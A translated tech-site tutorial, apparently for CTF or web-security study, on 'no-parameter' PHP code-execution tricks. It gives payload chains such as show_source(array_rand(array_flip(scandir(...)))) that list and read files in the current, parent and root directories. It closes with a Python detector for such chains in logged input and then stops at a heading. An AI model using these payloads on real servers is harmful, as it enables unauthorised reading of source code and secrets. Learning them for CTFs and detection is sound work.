2025-03-30 Update From: SLTechnology News&Howtos
Shulou(Shulou.com)05/31 Report--
Many people who are new to the topic are unsure how no-parameter file reading works in PHP RCE. This article summarizes the causes of the problem and the ways to solve it. I hope it helps you solve this problem.
1. What does "no parameter" mean?
It means you cannot call a function with literal arguments.
The code can be a(), a(b()) or a(b(c())), but it cannot be a('b') or a('b','c'); no arguments may be written out.
So file reading or command execution has to be done with functions that take no literal arguments.
2. No-parameter file reading
View the current directory file names
Normally, print_r(scandir('.')); lists all files in the current directory and outputs them as an array.
The question is how to construct the "." argument without writing it as a literal.
The localeconv() function returns an array of local numeric and currency format information, and the first item of that array is ".".
https://www.w3school.com.cn/php/func_string_localeconv.asp
current() returns the current element of the array, which by default is the first value.
So print_r(scandir(current(localeconv()))); prints the file names in the current directory, just like print_r(scandir('.'));.
print_r(scandir(pos(localeconv()))); also works; pos() is an alias of current().
The reset() function points the internal pointer to the first element in the array and outputs it.
Related methods:
current() - returns the value of the current element in the array
end() - points the internal pointer to the last element in the array and outputs it
next() - points the internal pointer to the next element in the array and outputs it
prev() - points the internal pointer to the previous element in the array and outputs it
each() - returns the key name and key value of the current element and moves the internal pointer forward
So now we're going to construct the parameters of reset().
chr(46) is the character ".", so we need to construct 46.
chr(rand()) # depends on luck; unrealistic
chr(time())
chr(current(localtime(time())))
chr(time())
The chr() function has a period of 256, so chr(46), chr(302) and chr(558) are all equal to ".".
So with chr(time()), "." must occur once in every cycle of 256 seconds.
chr(current(localtime(time())))
localtime() returns the local time as a numeric array or an associative array.
The key names of the associative array are as follows:
[tm_sec] - seconds
[tm_min] - minutes
[tm_hour] - hour
[tm_mday] - the day of the month
[tm_mon] - the month of the year, with 0 indicating January
[tm_year] - year, counted from 1900
[tm_wday] - day of the week (Sunday=0)
[tm_yday] - day of the year
[tm_isdst] - whether daylight saving time is currently in effect
The first value of the array increases by 1 every second, so it reaches 46 within 60 seconds at most. current() then returns that first value, and chr() turns it into ".".
phpversion() returns the PHP version, for example 5.4.45
floor(phpversion()) returns 5
sqrt(floor(phpversion())) returns 2.2360679774998
tan(floor(sqrt(floor(phpversion())))) returns -2.1850398632615
cosh(tan(floor(sqrt(floor(phpversion()))))) returns 4.5017381103491
sinh(cosh(tan(floor(sqrt(floor(phpversion())))))) returns 45.081318677156
ceil(sinh(cosh(tan(floor(sqrt(floor(phpversion()))))))) returns 46
chr(ceil(sinh(cosh(tan(floor(sqrt(floor(phpversion())))))))) returns "."
crypt() returns a string encrypted using the DES, Blowfish, or MD5 algorithm.
The hebrevc() function converts Hebrew text from a right-to-left stream to a left-to-right stream. At the same time, it converts new lines (\n) to
hebrevc(crypt(arg)) produces a random hash whose first character is randomly "$" (high probability) or "." (low probability); chr(ord()) is then used to take only the first character.
ord() returns the ASCII value of the first character in the string.
print_r(scandir(chr(ord(hebrevc(crypt(time())))))); try several times.
strrev(crypt(serialize(array()))) can also yield ".". Here the dot appears as the last character of crypt(serialize(array())), so strrev() is needed to reverse the string before chr(ord()) takes the first character.
print_r(scandir(chr(ord(strrev(crypt(serialize(array())))))));
Absolute path
Normally, we can also use print_r(scandir('absolute path')); to view the file names in the current directory.
getcwd() and realpath('.') both return the absolute path.
So print_r(scandir(getcwd())); also outputs all the file names in the current folder.
Read the current directory file
The previous methods output the file names in the current directory. If a file cannot be displayed directly, such as PHP source code, we also need a function to read it.
The previous methods output an array whose values are the file names, so how do we pick the file we want to read out of the array?
To get the contents of the last file, we can use:
show_source(end(scandir(getcwd()))); # or use other functions: readfile, highlight_file, file_get_contents
readgzfile() # can also read files, often used to bypass filtering
This raises the error "Strict Standards: Only variables should be passed by reference". The reason: from PHP 5.3 on, by default only actual variables can be passed by reference, not the return value of a function. It does not stop us from reading the file.
array_reverse() returns the array with its elements in reverse order.
The file that was originally in last place can then be read from first place:
show_source(current(array_reverse(scandir(getcwd()))));
If it's the penultimate one, we can use:
readfile(next(array_reverse(scandir(getcwd()))));
I thought I could continue to use next(), but it didn't work.
So how do we read other files?
We can use array_rand(array_flip()), where array_flip() swaps the keys and values of the array, and array_rand() returns a random key from it.
readfile(array_rand(array_flip(scandir(getcwd()))));
readfile(array_rand(array_flip(scandir(current(localeconv())))));
What if the target file is not in the current directory?
dirname(): returns the directory portion of the path
As you can see from the figure, if the value passed in is an absolute path without a file name, the parent path is returned; if the absolute path includes a file name, the directory containing the file is returned.
chdir(): changes the current working directory
print_r(scandir(dirname(getcwd()))); // view the files in the parent directory
Construct ".."
print_r(next(scandir(getcwd()))); the second element of the array returned by scandir(getcwd()) is "..", so next() retrieves it.
print_r(scandir(next(scandir(getcwd())))); // this also lists the files in the parent directory
Combined with the constructions mentioned above, ".." can also be obtained with:
next(scandir(chr(ord(hebrevc(crypt(time()))))));
Read the parent directory file
Calling print_r(readfile(array_rand(scandir(dirname(getcwd()))))); directly does not work and raises an error: by default the file is looked up and read in the current working directory, but it is in the parent directory. So change the current working directory first by calling chdir() beforehand:
show_source(array_rand(array_flip(scandir(dirname(chdir(dirname(getcwd())))))));
If you cannot use dirname(), you can construct ".." to switch paths and then read:
However, getcwd() and localeconv() do not accept arguments, so the chdir() call cannot be nested inside them; the syntax does not allow it. The earlier hebrevc(crypt(arg)) construction does take an argument, so we can use it here:
show_source(array_rand(array_flip(scandir(chr(ord(hebrevc(crypt(chdir(next(scandir(getcwd())))))))))));
or, more complex:
show_source(array_rand(array_flip(scandir(chr(ord(hebrevc(crypt(chdir(next(scandir(chr(ord(hebrevc(crypt(phpversion())))))))))))))));
You can also use:
show_source(array_rand(array_flip(scandir(chr(current(localtime(time(chdir(next(scandir(current(localeconv()))))))))))));
This one depends on the current second, so refreshing by hand can take a long time. If the file is the first or second entry, counted from the front or from the back, it is best to locate it directly.
And:
if(chdir(next(scandir(getcwd()))))show_source(array_rand(array_flip(scandir(getcwd()))));
View and read root directory files
print_r(scandir(chr(ord(strrev(crypt(serialize(array())))))));
The first character of the string produced by strrev(crypt(serialize(array()))) is likely to be "/", so the payload above can be used to view the root directory files.
But there are permission restrictions: on Linux, certain permissions are needed to read the directory, so it may not succeed.
if(chdir(chr(ord(strrev(crypt(serialize(array())))))))print_r(scandir(getcwd()));
if(chdir(chr(ord(strrev(crypt(serialize(array())))))))show_source(array_rand(array_flip(scandir(getcwd()))));
The array_flip() function swaps the key names and their associated values in the array.
The array_rand() function returns a random key name from an array, or an array of random key names if you ask it to return more than one.
end() - points the internal pointer of the array to the last cell
key() - gets the key name from the associative array
each() - returns the current key/value pair in the array and moves the array pointer one step forward
prev() - moves the internal pointer of the array back one position
reset() - points the internal pointer of the array to the first cell
next() - moves the internal pointer of the array forward one position
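For the detection side, the chains above share one recognizable shape: nothing but identifiers and parentheses, ending in one of the file functions the article names. The following is an added example, not code from the original article; it checks logged input values for that shape, and the names SINKS, FS, call_names, classify and scan, as well as the sample values, are this example's own.

```python
import re

# Function names come from the article; the two groups are this example's own.
SINKS = {"show_source", "readfile", "highlight_file", "file_get_contents", "readgzfile"}
FS = {"scandir", "chdir", "getcwd", "dirname", "realpath"}
TOKEN = re.compile(r"\s+|[A-Za-z_]\w*|[();]")

def call_names(code):
    """Called function names if code is only identifiers, parentheses and ';'
    with balanced nesting, e.g. a(b(c())); otherwise None."""
    tokens = TOKEN.findall(code)
    if "".join(tokens) != code:
        return None  # quotes, digits, '$', commas or operators are present
    tokens = [t for t in tokens if not t.isspace()]
    depth, names = 0, []
    for i, tok in enumerate(tokens):
        if tok == "(":
            depth += 1
            if i and tokens[i - 1] not in {"(", ")", ";"}:
                names.append(tokens[i - 1].lower())
        elif tok == ")":
            depth -= 1
            if depth < 0:
                return None
    return names if depth == 0 and names else None

def classify(value):
    names = call_names(value)
    if names is None:
        return "not-a-chain"
    used = set(names)
    if used & SINKS and used & FS:
        return "file-read-chain"
    if used & FS:
        return "directory-listing-chain"
    return "argument-free-chain"

# Constructed sample values, as they might appear in a logged request parameter.
SAMPLES = [
    "print_r(scandir(current(localeconv())));",
    "show_source(end(scandir(getcwd())));",
    "page=2&sort=asc",
    "print_r(scandir('.'));",
]

def scan(values):
    return [(v, c) for v in values if (c := classify(v)) != "not-a-chain"]

if __name__ == "__main__":
    for value, verdict in scan(SAMPLES):
        print(f"{verdict:24} {value}")
```

Values that contain a literal argument, such as print_r(scandir('.'));, fall outside this shape on purpose and need an ordinary code-injection rule instead.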
Using wildcard temporary files